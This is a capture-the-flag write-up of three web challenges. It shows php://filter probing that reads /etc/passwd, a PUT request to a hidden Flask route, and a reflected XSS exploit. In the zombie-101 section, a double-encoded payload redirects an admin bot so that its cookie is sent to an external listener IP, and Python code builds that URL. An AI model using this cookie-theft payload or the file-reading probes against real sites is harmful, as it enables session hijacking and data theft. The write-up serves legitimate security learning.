Wolv2023

Preface

No idea what this competition was; just writing up the challenges I looked at.

filter-madness

The challenge opens with a submission box. Entering 123 returns the following (note that the file is still read and returned despite the two warnings):

Warning: file_get_contents(): Unable to locate filter "123" in /var/www/html/index.php on line 11

Warning: file_get_contents(): Unable to create filter (123) in /var/www/html/index.php on line 11
Can you submit some madness that will return the flag?

Your filter madness: php://filter/123/resource=/etc/passwd
Your filter madness length: 37
Your filter madness results: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Entering convert.base64-encode instead returns the base64-encoded contents of /etc/passwd:

Can you submit some madness that will return the flag?

Your filter madness: php://filter/convert.base64-encode/resource=/etc/passwd
Your filter madness length: 55
Your filter madness results: cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2Jpb

At first glance the challenge is about the php://filter wrapper, but the resource part of the URL is hard-coded to /etc/passwd and the user input only ever lands in the filter slot. Testing showed that / (among other characters) is rejected, and none of the approaches I tried got anywhere. The page does link to an "info" page, though, which turns out to be phpinfo(); searching that page for "flag" actually finds it??? I'm not sure what the intended solution was. Two things worth keeping in mind from this: phpinfo() dumps the process environment and $_SERVER, which is where a flag set on the container typically ends up; and, as the first response shows, a filter name PHP cannot locate only produces warnings, file_get_contents() still reads and returns the resource.
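To make the filter-slot behaviour concrete, here is a small Python model of how php://filter URLs are split and applied. This is an added example for this write-up, not the challenge's PHP code: the /etc/passwd content is constructed, only three of PHP's stream filters are reimplemented, and the is_blocked() check is an assumption based on the write-up's note that / was rejected.

```python
import base64
import codecs
import warnings

# Constructed stand-in for the server's /etc/passwd (two entries suffice).
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")
FILES = {"/etc/passwd": PASSWD}

# Three of PHP's built-in stream filters, reimplemented; everything else
# is "unknown" to this model, just as "123" was unknown to PHP above.
FILTERS = {
    "convert.base64-encode": lambda s: base64.b64encode(s.encode()).decode(),
    "string.rot13": lambda s: codecs.encode(s, "rot_13"),
    "string.toupper": str.upper,
}


def parse_filter_url(url):
    """Split php://filter/<chain>/resource=<path>.

    Like PHP, take everything after the first "/resource=" as the path.
    What precedes it is a "/"-separated list of filter groups, each a
    "|"-separated chain, optionally prefixed with read= or write=.
    Only read filters matter for file_get_contents(), so write= groups
    are dropped.
    """
    prefix = "php://filter/"
    if not url.startswith(prefix):
        raise ValueError("not a php://filter URL")
    body = url[len(prefix):]
    idx = body.find("/resource=")
    if idx < 0:
        raise ValueError("No URL resource specified")
    chain, resource = body[:idx], body[idx + len("/resource="):]
    names = []
    for group in chain.split("/"):
        if group.startswith("write="):
            continue
        if group.startswith("read="):
            group = group[len("read="):]
        names.extend(n for n in group.split("|") if n)
    return names, resource


def file_get_contents(url):
    """Model file_get_contents() over the in-memory FILES.

    As in the challenge output, a filter name that cannot be located only
    raises a warning; the read itself still goes ahead unfiltered.
    """
    names, resource = parse_filter_url(url)
    data = FILES[resource]
    for name in names:
        func = FILTERS.get(name)
        if func is None:
            warnings.warn(f'Unable to locate filter "{name}"')
            continue
        data = func(data)
    return data


def is_blocked(user_input):
    """Assumed input check: the write-up reports that "/" is rejected."""
    return "/" in user_input


def challenge(user_input):
    """The challenge's sink as described: input lands in the filter slot,
    the resource is fixed to /etc/passwd."""
    if is_blocked(user_input):
        raise ValueError("input rejected")
    return file_get_contents(f"php://filter/{user_input}/resource=/etc/passwd")
```

challenge("123") warns and hands back the raw file, challenge("convert.base64-encode") reproduces the base64 output shown above, and chains such as string.rot13|string.toupper are applied left to right. Because the read always stops at the first /resource= and the suffix is fixed, nothing placed in the filter slot changes which file is read; that is why the only thing to extract here is a transformed /etc/passwd.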

charlottesweb

Opening the developer tools (F12) shows the hint <!--/src-->.

Visiting /src returns the application source:

import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
    return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
    return flask.send_file('app.py')   # serves its own source code

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
    return open('flag').read()         # only reachable with the PUT method

The logic is simple: send a PUT request to /super-secret-route-nobody-will-guess and the flag comes back. Restricting a route to an unusual HTTP method is obscurity, not access control; anyone who has read the source (which the app hands out at /src) can call it.
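The request itself is just curl -X PUT http://host/super-secret-route-nobody-will-guess. The following is an added, self-contained Python example (not the challenge's code) that stands up a stdlib HTTP server mimicking the Flask app's method restriction and shows how to issue the PUT with urllib; the flag value is a constructed placeholder.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

FLAG = "wctf{constructed-placeholder-flag}"   # constructed, not the real flag
ROUTE = "/super-secret-route-nobody-will-guess"


class Handler(BaseHTTPRequestHandler):
    """Stand-in for the Flask app: the flag route answers PUT only."""

    def do_GET(self):
        # Flask replies 405 Method Not Allowed when the route exists but
        # the method is not in its methods list.
        self.send_error(405 if self.path == ROUTE else 404)

    def do_PUT(self):
        if self.path != ROUTE:
            self.send_error(404)
            return
        body = FLAG.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo quiet


def serve():
    """Start the stand-in server on a free loopback port in a daemon thread."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(base, method):
    """Request ROUTE with the given method; return (status, body)."""
    try:
        with urlopen(Request(base + ROUTE, method=method), timeout=5) as resp:
            return resp.status, resp.read().decode()
    except HTTPError as err:
        return err.code, ""


def demo():
    """GET is refused, PUT returns the flag."""
    srv = serve()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    try:
        return {method: fetch(base, method) for method in ("GET", "PUT")}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for method, (status, body) in demo().items():
        print(f"{method} {ROUTE} -> {status} {body}")
```

The point of the contrast is that the 405 on GET tells you the route exists; the only thing standing between a reader of app.py and the flag is choosing the right verb.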

zombie-101

The challenge is XSS to steal a cookie. I recognised that right away but did not manage to exploit it at the time; the encoding is the interesting part.

http://49.232.142.230:11521/visit?url=http%3A%2F%2F49.232.142.230%3A12623%2Fzombie%3Fshow%3D%253Cscript%253Ewindow.location%253D'http%253A%252F%252F220.203.23.131%253A8010%252F%253Fcookie%253D'%252Bbtoa(JSON.stringify(document.cookie))%253B%253C%252Fscript%253E


The show parameter is reflected unescaped, so there is XSS there. The check section below it takes a URL and says it will be visited, which makes the plan obvious: get the admin's browser to load the payload and ship its cookie to a server I control.

One snag: submitting my VPS address directly is rejected, because the hostname must be 49.232.142.230. The payload therefore has to be nested: point the bot at the vulnerable /zombie page on the allowed host, and let that page's XSS redirect the browser to my server.

The PoC used: ?url=http://49.232.142.230:12623/zombie?show=<script>window.location='http://220.203.23.131:8010/?cookie='+btoa(JSON.stringify(document.cookie));</script>

One detail to get right: the outer part is URL-encoded once, while everything from show= onward is encoded twice. The value crosses two query-string parsers: /visit decodes the url parameter once, and the bot's request to /zombie decodes show once more. Encoded only once, the + in the script reaches /zombie as a literal + and is decoded as a space, which breaks the JavaScript. So the final PoC:

http://49.232.142.230:12623/visit?url=http%3A%2F%2F49.232.142.230%3A12623%2Fzombie%3Fshow%3D%253Cscript%253Ewindow.location%253D'http%253A%252F%252F220.203.23.131%253A8010%252F%253Fcookie%253D'%252Bbtoa(JSON.stringify(document.cookie))%253B%253C%252Fscript%253E
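To check the two encoding layers rather than hand-encode them, here is an added Python example (not part of the original write-up) that builds the nested URL with urllib and then models the two decode steps the bot and /zombie perform. The hosts and ports are the ones from the write-up; the decoding model is an assumption about how the two query-string parsers behave, based on standard percent-decoding rules.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Constructed from the write-up: the bot endpoint, the XSS sink on the
# allow-listed host, and the attacker's listener.
VISIT = "http://49.232.142.230:12623/visit?url="
SINK = "http://49.232.142.230:12623/zombie?show="
LISTENER = "http://220.203.23.131:8010/?cookie="
PAYLOAD = ("<script>window.location='" + LISTENER
           + "'+btoa(JSON.stringify(document.cookie));</script>")

# The write-up's final PoC, kept here so the builder can be checked against it.
WRITEUP_POC = (
    "http://49.232.142.230:12623/visit?url="
    "http%3A%2F%2F49.232.142.230%3A12623%2Fzombie%3Fshow%3D"
    "%253Cscript%253Ewindow.location%253D'http%253A%252F%252F220.203.23.131"
    "%253A8010%252F%253Fcookie%253D'%252Bbtoa(JSON.stringify(document.cookie))"
    "%253B%253C%252Fscript%253E"
)

# Characters the write-up left unencoded; urllib never encodes letters,
# digits and "_.-~" anyway.
SAFE = "'()"


def build_visit_url(payload, layers=2):
    """Nest payload inside the /zombie URL, then inside the /visit URL.

    The payload crosses two query-string parsers: /visit decodes the url
    parameter once, then the bot's request makes /zombie decode show once
    more.  So the payload is percent-encoded `layers` (normally 2) times,
    while the /zombie URL around it is encoded exactly once.
    """
    inner = payload
    for _ in range(layers):
        inner = quote(inner, safe=SAFE)
    return VISIT + quote(SINK, safe="") + inner


def simulate_bot(visit_url):
    """Model the two decode steps the payload goes through.

    Returns (hostname the bot would check, show value /zombie would see).
    """
    url = parse_qs(urlsplit(visit_url).query)["url"][0]   # decode 1: /visit
    parts = urlsplit(url)
    show = parse_qs(parts.query)["show"][0]                # decode 2: /zombie
    return parts.hostname, show


if __name__ == "__main__":
    print(build_visit_url(PAYLOAD) == WRITEUP_POC)   # True
    print(simulate_bot(build_visit_url(PAYLOAD))[1])             # intact script
    print(simulate_bot(build_visit_url(PAYLOAD, layers=1))[1])   # "+" became " "
```

Running the single-layer variant through simulate_bot() shows the failure mode: the hostname check still passes, but /zombie receives '...cookie=' btoa(...) with a space where the + was, which is not valid JavaScript. That is the whole reason for the second encoding pass.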


The listener receives the cookie as a base64 string; decode it and the flag is there.